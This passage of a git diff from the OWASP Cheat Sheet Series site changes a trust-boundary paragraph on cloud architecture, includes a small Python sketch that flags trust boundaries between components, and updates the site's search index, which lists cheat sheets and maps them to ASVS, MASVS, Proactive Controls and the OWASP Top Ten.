Trust boundaries are connections between components within a system where a trust decision has to be made by the components. Put another way, a trust boundary is a point where two components with potentially different trust levels meet. These boundaries can range in scale, from the degrees of trust given to users interacting with an application, to trusting or verifying specific claims between code functions or components within a cloud architecture. Generally speaking, however, it suffices to trust each component to perform its function correctly and securely. Therefore, trust boundaries will likely occur at the connections between cloud components, and between the application and third-party elements, like end users and other vendors.

-

As an example, consider the architecture below. An API gateway connects to a compute instance (ephemeral or persistent), which then accesses a persistent storage resource. Separately, there exists a server which can verify the authentication, authorization and/or identity of the caller. This is a generic representation of an OAuth, IAM or directory system, which controls access to these resources. Additionally, there exists an Ephemeral IAM server which controls access for the stored resources (using an approach like the [IAM Access][#iam-access] section above). As shown by the dotted lines, trust boundaries exist between each compute component, the API gateway and the auth/identity server, even though many or all of the elements could be in the same application.

+

As an example, consider the architecture below. An API gateway connects to a compute instance (ephemeral or persistent), which then accesses a persistent storage resource. Separately, there exists a server which can verify the authentication, authorization and/or identity of the caller. This is a generic representation of an OAuth, IAM or directory system, which controls access to these resources. Additionally, there exists an Ephemeral IAM server which controls access for the stored resources (using an approach like the IAM Access section above). As shown by the dotted lines, trust boundaries exist between each compute component, the API gateway and the auth/identity server, even though many or all of the elements could be in the same application.

Trust Boundaries

Exploring Different Levels of Trust

Architects have to select a trust configuration between components, using quantitative factors like risk score/tolerance and project velocity, as well as subjective security goals. Each example below details trust boundary relationships to better explain the implications of trusting a certain resource. The threat level of a specific resource, shown as a color from green (safe) to red (dangerous), outlines which resources shouldn't be trusted.

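The trust-boundary example above lends itself to a small illustration. Below is a minimal sketch in Python, assuming purely illustrative component names and trust-domain assignments (none of these values come from the cheat sheet), that models the described architecture as a set of connections and flags every connection whose endpoints sit in different trust domains as a trust boundary.

```python
# Minimal sketch: group the example architecture's components into trust
# domains and flag every connection that crosses domains as a trust boundary.
# Component names and domain assignments are illustrative assumptions only.

TRUST_DOMAIN = {
    "end_user": "public",               # third-party element
    "api_gateway": "edge",
    "compute_instance": "application",  # ephemeral or persistent compute
    "persistent_storage": "data",
    "auth_identity_server": "identity", # generic OAuth / IAM / directory system
    "ephemeral_iam_server": "identity",
}

# Connections between components in the example architecture.
CONNECTIONS = [
    ("end_user", "api_gateway"),
    ("api_gateway", "compute_instance"),
    ("compute_instance", "persistent_storage"),
    ("api_gateway", "auth_identity_server"),
    ("compute_instance", "auth_identity_server"),
    ("compute_instance", "ephemeral_iam_server"),
]


def trust_boundaries(connections, domains):
    """Return connections whose endpoints belong to different trust domains."""
    return [(a, b) for a, b in connections if domains[a] != domains[b]]


if __name__ == "__main__":
    for a, b in trust_boundaries(CONNECTIONS, TRUST_DOMAIN):
        print(f"trust boundary: {a} ({TRUST_DOMAIN[a]}) -> {b} ({TRUST_DOMAIN[b]})")
```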
diff --git a/search/search_index.json b/search/search_index.json index 950257d75e..c29027143b 100644 --- a/search/search_index.json +++ b/search/search_index.json @@ -1 +1 @@ -{"config":{"lang":["en"],"separator":"[\\s\\-]+","pipeline":["stopWordFilter"]},"docs":[{"location":"index.html","title":"Introduction","text":"

The OWASP Cheat Sheet Series was created to provide a concise collection of high value information on specific application security topics. These cheat sheets were created by various application security professionals who have expertise in specific topics.

We hope that this project provides you with excellent security guidance in an easy to read format.

You can download this site here.

An ATOM feed is available here with the latest updates.

Project leaders:

Core team:

Project links:

"},{"location":"Glossary.html","title":"Index Alphabetical","text":"

85 cheat sheets available.

Icons beside the cheat sheet name indicate in which language(s) code snippet(s) are provided.

A B C D E F G H I J K L M N O P Q R S T U V W X

"},{"location":"Glossary.html#a","title":"A","text":"

Authentication Cheat Sheet.

Authorization Cheat Sheet.

AJAX Security Cheat Sheet.

Attack Surface Analysis Cheat Sheet.

Access Control Cheat Sheet.

Authorization Testing Automation Cheat Sheet.

Abuse Case Cheat Sheet.

"},{"location":"Glossary.html#b","title":"B","text":"

Bean Validation Cheat Sheet.

"},{"location":"Glossary.html#c","title":"C","text":"

Credential Stuffing Prevention Cheat Sheet.

Cryptographic Storage Cheat Sheet.

Content Security Policy Cheat Sheet.

Choosing and Using Security Questions Cheat Sheet.

Cross-Site Request Forgery Prevention Cheat Sheet.

Cross Site Scripting Prevention Cheat Sheet.

C-Based Toolchain Hardening Cheat Sheet.

Clickjacking Defense Cheat Sheet.

"},{"location":"Glossary.html#d","title":"D","text":"

Denial of Service Cheat Sheet.

DOM based XSS Prevention Cheat Sheet.

Django REST Framework Cheat Sheet.

DOM Clobbering Prevention Cheat Sheet.

Deserialization Cheat Sheet.

Docker Security Cheat Sheet.

Database Security Cheat Sheet.

DotNet Security Cheat Sheet.

"},{"location":"Glossary.html#e","title":"E","text":"

Error Handling Cheat Sheet.

"},{"location":"Glossary.html#f","title":"F","text":"

File Upload Cheat Sheet.

Forgot Password Cheat Sheet.

"},{"location":"Glossary.html#g","title":"G","text":"

GraphQL Cheat Sheet.

"},{"location":"Glossary.html#h","title":"H","text":"

HTTP Headers Cheat Sheet.

HTML5 Security Cheat Sheet.

HTTP Strict Transport Security Cheat Sheet.

"},{"location":"Glossary.html#i","title":"I","text":"

Insecure Direct Object Reference Prevention Cheat Sheet.

Infrastructure as Code Security Cheat Sheet.

Input Validation Cheat Sheet.

Injection Prevention Cheat Sheet.

Injection Prevention in Java Cheat Sheet.

"},{"location":"Glossary.html#j","title":"J","text":"

JAAS Cheat Sheet.

Java Security Cheat Sheet.

JSON Web Token for Java Cheat Sheet.

"},{"location":"Glossary.html#k","title":"K","text":"

Kubernetes Security Cheat Sheet.

Key Management Cheat Sheet.

"},{"location":"Glossary.html#l","title":"L","text":"

Logging Vocabulary Cheat Sheet.

Laravel Cheat Sheet.

Logging Cheat Sheet.

LDAP Injection Prevention Cheat Sheet.

"},{"location":"Glossary.html#m","title":"M","text":"

Microservices Security Cheat Sheet.

Mass Assignment Cheat Sheet.

Microservices based Security Arch Doc Cheat Sheet.

Multifactor Authentication Cheat Sheet.

"},{"location":"Glossary.html#n","title":"N","text":"

Nodejs Security Cheat Sheet.

NodeJS Docker Cheat Sheet.

NPM Security Cheat Sheet.

Network Segmentation Cheat Sheet.

"},{"location":"Glossary.html#o","title":"O","text":"

OS Command Injection Defense Cheat Sheet.

"},{"location":"Glossary.html#p","title":"P","text":"

Pinning Cheat Sheet.

Prototype Pollution Prevention Cheat Sheet.

PHP Configuration Cheat Sheet.

Password Storage Cheat Sheet.

"},{"location":"Glossary.html#q","title":"Q","text":"

Query Parameterization Cheat Sheet.

"},{"location":"Glossary.html#r","title":"R","text":"

Ruby on Rails Cheat Sheet.

REST Assessment Cheat Sheet.

REST Security Cheat Sheet.

"},{"location":"Glossary.html#s","title":"S","text":"

SAML Security Cheat Sheet.

Secrets Management Cheat Sheet.

Session Management Cheat Sheet.

Securing Cascading Style Sheets Cheat Sheet.

SQL Injection Prevention Cheat Sheet.

Secure Cloud Architecture Cheat Sheet.

Server Side Request Forgery Prevention Cheat Sheet.

Secure Product Design Cheat Sheet.

"},{"location":"Glossary.html#t","title":"T","text":"

Transaction Authorization Cheat Sheet.

Transport Layer Protection Cheat Sheet.

TLS Cipher String Cheat Sheet.

Third Party Javascript Management Cheat Sheet.

Threat Modeling Cheat Sheet.

"},{"location":"Glossary.html#u","title":"U","text":"

User Privacy Protection Cheat Sheet.

Unvalidated Redirects and Forwards Cheat Sheet.

"},{"location":"Glossary.html#v","title":"V","text":"

Virtual Patching Cheat Sheet.

Vulnerable Dependency Management Cheat Sheet.

Vulnerability Disclosure Cheat Sheet.

"},{"location":"Glossary.html#w","title":"W","text":"

Web Service Security Cheat Sheet.

"},{"location":"Glossary.html#x","title":"X","text":"

XSS Filter Evasion Cheat Sheet.

XS Leaks Cheat Sheet.

XML External Entity Prevention Cheat Sheet.

XML Security Cheat Sheet.

"},{"location":"IndexASVS.html","title":"ASVS Index","text":""},{"location":"IndexASVS.html#table-of-contents","title":"Table of Contents","text":""},{"location":"IndexASVS.html#objective","title":"Objective","text":"

The objective of this index is to help OWASP Application Security Verification Standard (ASVS) users clearly identify which cheat sheets are useful for each section during their usage of the ASVS.

This index is based on version 4.x of the ASVS.

"},{"location":"IndexASVS.html#v1-architecture-design-and-threat-modeling-requirements","title":"V1: Architecture, Design and Threat Modeling Requirements","text":""},{"location":"IndexASVS.html#v11-secure-software-development-lifecycle-requirements","title":"V1.1 Secure Software Development Lifecycle Requirements","text":"

Threat Modeling Cheat Sheet.

Abuse Case Cheat Sheet.

Attack Surface Analysis Cheat Sheet.

"},{"location":"IndexASVS.html#v12-authentication-architectural-requirements","title":"V1.2 Authentication Architectural Requirements","text":"

None.

"},{"location":"IndexASVS.html#v13-session-management-architectural-requirements","title":"V1.3 Session Management Architectural Requirements","text":"

None.

"},{"location":"IndexASVS.html#v14-access-control-architectural-requirements","title":"V1.4 Access Control Architectural Requirements","text":"

Docker Security Cheat Sheet.

"},{"location":"IndexASVS.html#v15-input-and-output-architectural-requirements","title":"V1.5 Input and Output Architectural Requirements","text":"

Abuse Case Cheat Sheet.

Deserialization Cheat Sheet.

"},{"location":"IndexASVS.html#v16-cryptographic-architectural-requirements","title":"V1.6 Cryptographic Architectural Requirements","text":"

Cryptographic Storage Cheat Sheet.

Key Management Cheat Sheet.

"},{"location":"IndexASVS.html#v17-errors-logging-and-auditing-architectural-requirements","title":"V1.7 Errors, Logging and Auditing Architectural Requirements","text":"

Logging Cheat Sheet.

"},{"location":"IndexASVS.html#v18-data-protection-and-privacy-architectural-requirements","title":"V1.8 Data Protection and Privacy Architectural Requirements","text":"

Abuse Case Cheat Sheet.

User Privacy Protection Cheat Sheet.

"},{"location":"IndexASVS.html#v19-communications-architectural-requirements","title":"V1.9 Communications Architectural Requirements","text":"

Transport Layer Protection Cheat Sheet.

TLS Cipher String Cheat Sheet.

"},{"location":"IndexASVS.html#v110-malicious-software-architectural-requirements","title":"V1.10 Malicious Software Architectural Requirements","text":"

Third Party Javascript Management Cheat Sheet.

Virtual Patching Cheat Sheet.

"},{"location":"IndexASVS.html#v111-business-logic-architectural-requirements","title":"V1.11 Business Logic Architectural Requirements","text":"

Abuse Case Cheat Sheet.

"},{"location":"IndexASVS.html#v112-secure-file-upload-architectural-requirements","title":"V1.12 Secure File Upload Architectural Requirements","text":"

None.

"},{"location":"IndexASVS.html#v113-api-architectural-requirements","title":"V1.13 API Architectural Requirements","text":"

REST Security Cheat Sheet.

"},{"location":"IndexASVS.html#v114-configuration-architectural-requirements","title":"V1.14 Configuration Architectural Requirements","text":"

None.

"},{"location":"IndexASVS.html#v2-authentication-verification-requirements","title":"V2: Authentication Verification Requirements","text":""},{"location":"IndexASVS.html#v21-password-security-requirements","title":"V2.1 Password Security Requirements","text":"

Choosing and Using Security Questions Cheat Sheet.

Forgot Password Cheat Sheet.

Credential Stuffing Prevention Cheat Sheet

"},{"location":"IndexASVS.html#v22-general-authenticator-requirements","title":"V2.2 General Authenticator Requirements","text":"

Authentication Cheat Sheet.

Transport Layer Protection Cheat Sheet.

TLS Cipher String Cheat Sheet.

"},{"location":"IndexASVS.html#v23-authenticator-lifecycle-requirements","title":"V2.3 Authenticator Lifecycle Requirements","text":"

None.

"},{"location":"IndexASVS.html#v24-credential-storage-requirements","title":"V2.4 Credential Storage Requirements","text":"

Password Storage Cheat Sheet.

"},{"location":"IndexASVS.html#v25-credential-recovery-requirements","title":"V2.5 Credential Recovery Requirements","text":"

Choosing and Using Security Questions Cheat Sheet.

Forgot Password Cheat Sheet.

"},{"location":"IndexASVS.html#v26-look-up-secret-verifier-requirements","title":"V2.6 Look-up Secret Verifier Requirements","text":"

None.

"},{"location":"IndexASVS.html#v27-out-of-band-verifier-requirements","title":"V2.7 Out of Band Verifier Requirements","text":"

Forgot Password Cheat Sheet.

"},{"location":"IndexASVS.html#v28-single-or-multi-factor-one-time-verifier-requirements","title":"V2.8 Single or Multi Factor One Time Verifier Requirements","text":"

None.

"},{"location":"IndexASVS.html#v29-cryptographic-software-and-devices-verifier-requirements","title":"V2.9 Cryptographic Software and Devices Verifier Requirements","text":"

Cryptographic Storage Cheat Sheet.

Key Management Cheat Sheet.

"},{"location":"IndexASVS.html#v210-service-authentication-requirements","title":"V2.10 Service Authentication Requirements","text":"

None.

"},{"location":"IndexASVS.html#v3-session-management-verification-requirements","title":"V3: Session Management Verification Requirements","text":""},{"location":"IndexASVS.html#v31-fundamental-session-management-requirements","title":"V3.1 Fundamental Session Management Requirements","text":"

None.

"},{"location":"IndexASVS.html#v32-session-binding-requirements","title":"V3.2 Session Binding Requirements","text":"

Session Management Cheat Sheet.

"},{"location":"IndexASVS.html#v33-session-logout-and-timeout-requirements","title":"V3.3 Session Logout and Timeout Requirements","text":"

Session Management Cheat Sheet.

"},{"location":"IndexASVS.html#v34-cookie-based-session-management","title":"V3.4 Cookie-based Session Management","text":"

Session Management Cheat Sheet.

Cross-Site Request Forgery Prevention Cheat Sheet.

"},{"location":"IndexASVS.html#v35-token-based-session-management","title":"V3.5 Token-based Session Management","text":"

JSON Web Token Cheat Sheet for Java.

REST Security Cheat Sheet.

"},{"location":"IndexASVS.html#v36-re-authentication-from-a-federation-or-assertion","title":"V3.6 Re-authentication from a Federation or Assertion","text":"

None.

"},{"location":"IndexASVS.html#v37-defenses-against-session-management-exploits","title":"V3.7 Defenses Against Session Management Exploits","text":"

Session Management Cheat Sheet.

Transaction Authorization Cheat Sheet.

"},{"location":"IndexASVS.html#v4-access-control-verification-requirements","title":"V4: Access Control Verification Requirements","text":""},{"location":"IndexASVS.html#v41-general-access-control-design","title":"V4.1 General Access Control Design","text":"

Access Control Cheat Sheet.

Authorization Testing Automation.

"},{"location":"IndexASVS.html#v42-operation-level-access-control","title":"V4.2 Operation Level Access Control","text":"

Insecure Direct Object Reference Prevention Cheat Sheet.

Cross-Site Request Forgery Prevention Cheat Sheet.

Authorization Testing Automation.

"},{"location":"IndexASVS.html#v43-other-access-control-considerations","title":"V4.3 Other Access Control Considerations","text":"

REST Assessment Cheat Sheet.

"},{"location":"IndexASVS.html#v5-validation-sanitization-and-encoding-verification-requirements","title":"V5: Validation, Sanitization and Encoding Verification Requirements","text":""},{"location":"IndexASVS.html#v51-input-validation-requirements","title":"V5.1 Input Validation Requirements","text":"

Mass Assignment Cheat Sheet.

Input Validation Cheat Sheet.

"},{"location":"IndexASVS.html#v52-sanitization-and-sandboxing-requirements","title":"V5.2 Sanitization and Sandboxing Requirements","text":"

Server Side Request Forgery Prevention Cheat Sheet.

XSS Prevention Cheat Sheet.

DOM based XSS Prevention Cheat Sheet.

Unvalidated Redirects and Forwards Cheat Sheet.

"},{"location":"IndexASVS.html#v53-output-encoding-and-injection-prevention-requirements","title":"V5.3 Output encoding and Injection Prevention Requirements","text":"

XSS Prevention Cheat Sheet.

DOM based XSS Prevention Cheat Sheet.

HTML5 Security Cheat Sheet.

Injection Prevention Cheat Sheet.

Injection Prevention Cheat Sheet in Java.

Input Validation Cheat Sheet.

LDAP Injection Prevention Cheat Sheet.

OS Command Injection Defense Cheat Sheet.

Protect File Upload Against Malicious File.

Query Parameterization Cheat Sheet.

SQL Injection Prevention Cheat Sheet.

Unvalidated Redirects and Forwards Cheat Sheet.

Bean Validation Cheat Sheet.

XXE Prevention Cheat Sheet.

XML Security Cheat Sheet.

"},{"location":"IndexASVS.html#v54-memory-string-and-unmanaged-code-requirements","title":"V5.4 Memory, String, and Unmanaged Code Requirements","text":"

None.

"},{"location":"IndexASVS.html#v55-deserialization-prevention-requirements","title":"V5.5 Deserialization Prevention Requirements","text":"

Deserialization Cheat Sheet.

XXE Prevention Cheat Sheet.

XML Security Cheat Sheet.

"},{"location":"IndexASVS.html#v6-stored-cryptography-verification-requirements","title":"V6: Stored Cryptography Verification Requirements","text":""},{"location":"IndexASVS.html#v61-data-classification","title":"V6.1 Data Classification","text":"

Abuse Case Cheat Sheet.

User Privacy Protection Cheat Sheet.

"},{"location":"IndexASVS.html#v62-algorithms","title":"V6.2 Algorithms","text":"

Cryptographic Storage Cheat Sheet.

Key Management Cheat Sheet.

"},{"location":"IndexASVS.html#v63-random-values","title":"V6.3 Random Values","text":"

None.

"},{"location":"IndexASVS.html#v64-secret-management","title":"V6.4 Secret Management","text":"

Key Management Cheat Sheet.

"},{"location":"IndexASVS.html#v7-error-handling-and-logging-verification-requirements","title":"V7: Error Handling and Logging Verification Requirements","text":""},{"location":"IndexASVS.html#v71-log-content-requirements","title":"V7.1 Log Content Requirements","text":"

Logging Cheat Sheet.

"},{"location":"IndexASVS.html#v72-log-processing-requirements","title":"V7.2 Log Processing Requirements","text":"

Logging Cheat Sheet.

"},{"location":"IndexASVS.html#v73-log-protection-requirements","title":"V7.3 Log Protection Requirements","text":"

Logging Cheat Sheet.

"},{"location":"IndexASVS.html#v74-error-handling","title":"V7.4 Error Handling","text":"

Error Handling Cheat Sheet.

"},{"location":"IndexASVS.html#v8-data-protection-verification-requirements","title":"V8: Data Protection Verification Requirements","text":""},{"location":"IndexASVS.html#v81-general-data-protection","title":"V8.1 General Data Protection","text":"

None.

"},{"location":"IndexASVS.html#v82-client-side-data-protection","title":"V8.2 Client-side Data Protection","text":"

None.

"},{"location":"IndexASVS.html#v83-sensitive-private-data","title":"V8.3 Sensitive Private Data","text":"

None.

"},{"location":"IndexASVS.html#v9-communications-verification-requirements","title":"V9: Communications Verification Requirements","text":""},{"location":"IndexASVS.html#v91-communications-security-requirements","title":"V9.1 Communications Security Requirements","text":"

HTTP Strict Transport Security Cheat Sheet.

Transport Layer Protection Cheat Sheet.

TLS Cipher String Cheat Sheet.

"},{"location":"IndexASVS.html#v92-server-communications-security-requirements","title":"V9.2 Server Communications Security Requirements","text":"

None.

"},{"location":"IndexASVS.html#v10-malicious-code-verification-requirements","title":"V10: Malicious Code Verification Requirements","text":""},{"location":"IndexASVS.html#v101-code-integrity-controls","title":"V10.1 Code Integrity Controls","text":"

Third Party Javascript Management Cheat Sheet.

"},{"location":"IndexASVS.html#v102-malicious-code-search","title":"V10.2 Malicious Code Search","text":"

None.

"},{"location":"IndexASVS.html#v103-deployed-application-integrity-controls","title":"V10.3 Deployed Application Integrity Controls","text":"

Docker Security Cheat Sheet.

"},{"location":"IndexASVS.html#v11-business-logic-verification-requirements","title":"V11: Business Logic Verification Requirements","text":""},{"location":"IndexASVS.html#v111-business-logic-security-requirements","title":"V11.1 Business Logic Security Requirements","text":"

Abuse Case Cheat Sheet.

"},{"location":"IndexASVS.html#v12-file-and-resources-verification-requirements","title":"V12: File and Resources Verification Requirements","text":""},{"location":"IndexASVS.html#v121-file-upload-requirements","title":"V12.1 File Upload Requirements","text":"

Protect File Upload Against Malicious File.

"},{"location":"IndexASVS.html#v122-file-integrity-requirements","title":"V12.2 File Integrity Requirements","text":"

Protect File Upload Against Malicious File.

Third Party Javascript Management Cheat Sheet.

"},{"location":"IndexASVS.html#v123-file-execution-requirements","title":"V12.3 File execution Requirements","text":"

None.

"},{"location":"IndexASVS.html#v124-file-storage-requirements","title":"V12.4 File Storage Requirements","text":"

None.

"},{"location":"IndexASVS.html#v125-file-download-requirements","title":"V12.5 File Download Requirements","text":"

None.

"},{"location":"IndexASVS.html#v126-ssrf-protection-requirements","title":"V12.6 SSRF Protection Requirements","text":"

Server Side Request Forgery Prevention Cheat Sheet.

Unvalidated Redirects and Forwards Cheat Sheet.

"},{"location":"IndexASVS.html#v13-api-and-web-service-verification-requirements","title":"V13: API and Web Service Verification Requirements","text":""},{"location":"IndexASVS.html#v131-generic-web-service-security-verification-requirements","title":"V13.1 Generic Web Service Security Verification Requirements","text":"

Web Service Security Cheat Sheet.

Server Side Request Forgery Prevention Cheat Sheet.

"},{"location":"IndexASVS.html#v132-restful-web-service-verification-requirements","title":"V13.2 RESTful Web Service Verification Requirements","text":"

REST Assessment Cheat Sheet.

REST Security Cheat Sheet.

Cross-Site Request Forgery Prevention Cheat Sheet.

"},{"location":"IndexASVS.html#v133-soap-web-service-verification-requirements","title":"V13.3 SOAP Web Service Verification Requirements","text":"

XML Security Cheat Sheet.

"},{"location":"IndexASVS.html#v134-graphql-and-other-web-service-data-layer-security-requirements","title":"V13.4 GraphQL and other Web Service Data Layer Security Requirements","text":"

None.

"},{"location":"IndexASVS.html#v14-configuration-verification-requirements","title":"V14: Configuration Verification Requirements","text":""},{"location":"IndexASVS.html#v141-build","title":"V14.1 Build","text":"

Docker Security Cheat Sheet.

"},{"location":"IndexASVS.html#v142-dependency","title":"V14.2 Dependency","text":"

Docker Security Cheat Sheet.

Vulnerable Dependency Management Cheat Sheet.

"},{"location":"IndexASVS.html#v143-unintended-security-disclosure-requirements","title":"V14.3 Unintended Security Disclosure Requirements","text":"

Error Handling Cheat Sheet.

"},{"location":"IndexASVS.html#v144-http-security-headers-requirements","title":"V14.4 HTTP Security Headers Requirements","text":"

Content Security Policy Cheat Sheet.

"},{"location":"IndexASVS.html#v145-validate-http-request-header-requirements","title":"V14.5 Validate HTTP Request Header Requirements","text":"

None.

"},{"location":"IndexMASVS.html","title":"MASVS Index","text":""},{"location":"IndexMASVS.html#table-of-contents","title":"Table of Contents","text":""},{"location":"IndexMASVS.html#objective","title":"Objective","text":"

The objective of this index is to help OWASP Mobile Application Security Verification Standard (MASVS) users clearly identify which cheat sheets are useful for each section during their usage of the MASVS.

This index is based on version 1.x.x of the MASVS.

"},{"location":"IndexMASVS.html#v1-architecture-design-and-threat-modeling-requirements","title":"V1: Architecture, Design and Threat Modeling Requirements","text":"

Threat Modeling Cheat Sheet.

Abuse Case Cheat Sheet.

Attack Surface Analysis Cheat Sheet.

"},{"location":"IndexMASVS.html#v2-data-storage-and-privacy-requirements","title":"V2: Data Storage and Privacy Requirements","text":"

Password Storage Cheat Sheet.

Abuse Case Cheat Sheet.

User Privacy Protection Cheat Sheet.

Logging Cheat Sheet.

"},{"location":"IndexMASVS.html#v3-cryptography-requirements","title":"V3: Cryptography Requirements","text":"

Cryptographic Storage Cheat Sheet.

Key Management Cheat Sheet.

"},{"location":"IndexMASVS.html#v4-authentication-and-session-management-requirements","title":"V4: Authentication and Session Management Requirements","text":"

Authentication Cheat Sheet.

Authorization Cheat Sheet.

Session Management Cheat Sheet.

Transaction Authorization Cheat Sheet.

Access Control Cheat Sheet.

JSON Web Token Cheat Sheet for Java.

Credential Stuffing Prevention Cheat Sheet.

"},{"location":"IndexMASVS.html#v5-network-communication-requirements","title":"V5: Network Communication Requirements","text":"

Transport Layer Protection Cheat Sheet.

TLS Cipher String Cheat Sheet.

HTTP Strict Transport Security Cheat Sheet.

REST Security Cheat Sheet.

Web Service Security Cheat Sheet.

"},{"location":"IndexMASVS.html#v6-environmental-interaction-requirements","title":"V6: Environmental Interaction Requirements","text":"

None.

"},{"location":"IndexMASVS.html#v7-code-quality-and-build-setting-requirements","title":"V7: Code Quality and Build Setting Requirements","text":"

Vulnerable Dependency Management Cheat Sheet.

Error Handling Cheat Sheet.

Deserialization Cheat Sheet.

Logging Cheat Sheet.

Insecure Direct Object Reference Prevention Cheat Sheet.

Input Validation Cheat Sheet.

Injection Prevention Cheat Sheet.

Injection Prevention Cheat Sheet in Java.

OS Command Injection Defense Cheat Sheet.

Query Parameterization Cheat Sheet.

SQL Injection Prevention Cheat Sheet.

XXE Prevention Cheat Sheet.

XML Security Cheat Sheet.

"},{"location":"IndexMASVS.html#v8-resiliency-against-reverse-engineering-requirements","title":"V8: Resiliency Against Reverse Engineering Requirements","text":"

None.

"},{"location":"IndexProactiveControls.html","title":"Proactive Controls Index","text":""},{"location":"IndexProactiveControls.html#objective","title":"Objective","text":"

This cheatsheet will help users of the OWASP Proactive Controls identify which cheatsheets map to each Proactive Controls item. This mapping is based on the OWASP Proactive Controls version 3.0 (2018).

"},{"location":"IndexProactiveControls.html#1-define-security-requirements","title":"1. Define Security Requirements","text":"

Abuse Case Cheat Sheet

Attack Surface Analysis Cheat Sheet

Threat Modeling Cheat Sheet

"},{"location":"IndexProactiveControls.html#2-leverage-security-frameworks-and-libraries","title":"2. Leverage Security Frameworks and Libraries","text":"

Clickjacking Defense Cheat Sheet

DotNet Security Cheat Sheet (A3 Cross Site Scripting)

PHP Configuration Cheat Sheet

Ruby on Rails Cheat Sheet (Tools)

Ruby on Rails Cheat Sheet (XSS)

Vulnerable Dependency Management Cheat Sheet

"},{"location":"IndexProactiveControls.html#3-secure-database-access","title":"3. Secure Database Access","text":"

DotNet Security Cheat Sheet (Data Access)

DotNet Security Cheat Sheet (A1 SQL Injection)

Query Parameterization Cheat Sheet

Ruby on Rails Cheat Sheet (SQL Injection)

SQL Injection Prevention Cheat Sheet

"},{"location":"IndexProactiveControls.html#4-encode-and-escape-data","title":"4. Encode and Escape Data","text":"

AJAX Security Cheat Sheet (Client Side)

Cross Site Scripting Prevention Cheat Sheet

DOM based XSS Prevention Cheat Sheet

Injection Prevention Cheat Sheet

Injection Prevention Cheat Sheet in Java

LDAP Injection Prevention Cheat Sheet

"},{"location":"IndexProactiveControls.html#5-validate-all-inputs","title":"5. Validate All Inputs","text":"

Bean Validation Cheat Sheet

Deserialization Cheat Sheet

DotNet Security Cheat Sheet (HTTP Validation and Encoding)

DotNet Security Cheat Sheet (A8 Cross site request forgery)

DotNet Security Cheat Sheet (A10 Unvalidated redirects and forwards)

Input Validation Cheat Sheet

Injection Prevention Cheat Sheet

Injection Prevention Cheat Sheet in Java

Mass Assignment Cheat Sheet

OS Command Injection Defense Cheat Sheet

File Upload Cheat Sheet

REST Security Cheat Sheet (Input Validation)

Ruby on Rails Cheat Sheet (Command Injection)

Ruby on Rails Cheat Sheet (Mass Assignment and Strong Parameters)

Unvalidated Redirects and Forwards Cheat Sheet

XML External Entity Prevention Cheat Sheet

Server Side Request Forgery Prevention Cheat Sheet

"},{"location":"IndexProactiveControls.html#6-implement-digital-identity","title":"6. Implement Digital Identity","text":"

Authentication Cheat Sheet

Choosing and Using Security Questions Cheat Sheet

DotNet Security Cheat Sheet (Forms authentication)

DotNet Security Cheat Sheet (A2 Weak Account management)

Forgot Password Cheat Sheet

JAAS Cheat Sheet

JSON Web Token Cheat Sheet for Java

Password Storage Cheat Sheet

REST Security Cheat Sheet (JWT)

Ruby on Rails Cheat Sheet (Sessions)

Ruby on Rails Cheat Sheet (Authentication)

SAML Security Cheat Sheet

Session Management Cheat Sheet

"},{"location":"IndexProactiveControls.html#7-enforce-access-controls","title":"7. Enforce Access Controls","text":"

Access Control Cheat Sheet

Authorization Testing Automation

Credential Stuffing Prevention Cheat Sheet

Cross-Site_Request_Forgery_Prevention_Cheat_Sheet

DotNet Security Cheat Sheet (A4 Insecure Direct object references)

DotNet Security Cheat Sheet (A7 Missing function level access control)

REST Security Cheat Sheet (Access Control)

Ruby on Rails Cheat Sheet (Insecure Direct Object Reference or Forceful Browsing)

Ruby on Rails Cheat Sheet (CSRF)

Insecure Direct Object Reference Prevention Cheat Sheet

Transaction Authorization Cheat Sheet

"},{"location":"IndexProactiveControls.html#8-protect-data-everywhere","title":"8. Protect Data Everywhere","text":"

Cryptographic Storage Cheat Sheet

DotNet Security Cheat Sheet (Encryption)

DotNet Security Cheat Sheet (A6 Sensitive data exposure)

TLS Cipher String Cheat Sheet

Transport Layer Protection Cheat Sheet

Key Management Cheat Sheet

HTTP Strict Transport Security Cheat Sheet

Pinning Cheat Sheet

REST Security Cheat Sheet (HTTPS)

Ruby on Rails Cheat Sheet (Encryption)

User Privacy Protection Cheat Sheet

"},{"location":"IndexProactiveControls.html#9-implement-security-logging-and-monitoring","title":"9. Implement Security Logging and Monitoring","text":"

REST Security Cheat Sheet (Audit Logs)

Logging Cheat Sheet

"},{"location":"IndexProactiveControls.html#10-handle-all-errors-and-exceptions","title":"10. Handle All Errors and Exceptions","text":"

REST Security Cheat Sheet (Error Handling)

Error Handling Cheat Sheet

"},{"location":"IndexTopTen.html","title":"OWASP Top Ten 2021 : Related Cheat Sheets","text":"

The OWASP Top Ten is a standard awareness document for developers and web application security. It represents a broad consensus about the most critical security risks to web applications.

This cheat sheet will help users of the OWASP Top Ten identify which cheat sheets map to each security category. This mapping is based on the OWASP Top Ten 2021 version.

"},{"location":"IndexTopTen.html#a012021-broken-access-control","title":"A01:2021 \u2013 Broken Access Control","text":""},{"location":"IndexTopTen.html#a022021-cryptographic-failures","title":"A02:2021 \u2013 Cryptographic Failures","text":""},{"location":"IndexTopTen.html#a032021-injection","title":"A03:2021 \u2013 Injection","text":""},{"location":"IndexTopTen.html#a042021-insecure-design","title":"A04:2021 \u2013 Insecure Design","text":""},{"location":"IndexTopTen.html#a052021-security-misconfiguration","title":"A05:2021 \u2013 Security Misconfiguration","text":""},{"location":"IndexTopTen.html#a062021-vulnerable-and-outdated-components","title":"A06:2021 \u2013 Vulnerable and Outdated Components","text":""},{"location":"IndexTopTen.html#a072021-identification-and-authentication-failures","title":"A07:2021 \u2013 Identification and Authentication Failures","text":""},{"location":"IndexTopTen.html#a082021-software-and-data-integrity-failures","title":"A08:2021 \u2013 Software and Data Integrity Failures","text":""},{"location":"IndexTopTen.html#a092021-security-logging-and-monitoring-failures","title":"A09:2021 \u2013 Security Logging and Monitoring Failures","text":""},{"location":"IndexTopTen.html#a102021-server-side-request-forgery-ssrf","title":"A10:2021 \u2013 Server-Side Request Forgery (SSRF)","text":""},{"location":"IndexTopTen.html#a112021-next-steps","title":"A11:2021 \u2013 Next Steps","text":""},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html","title":"AJAX Security Cheat Sheet","text":""},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This document will provide a starting point for AJAX security and will hopefully be updated and expanded reasonably often to provide more detailed information about specific frameworks and technologies.

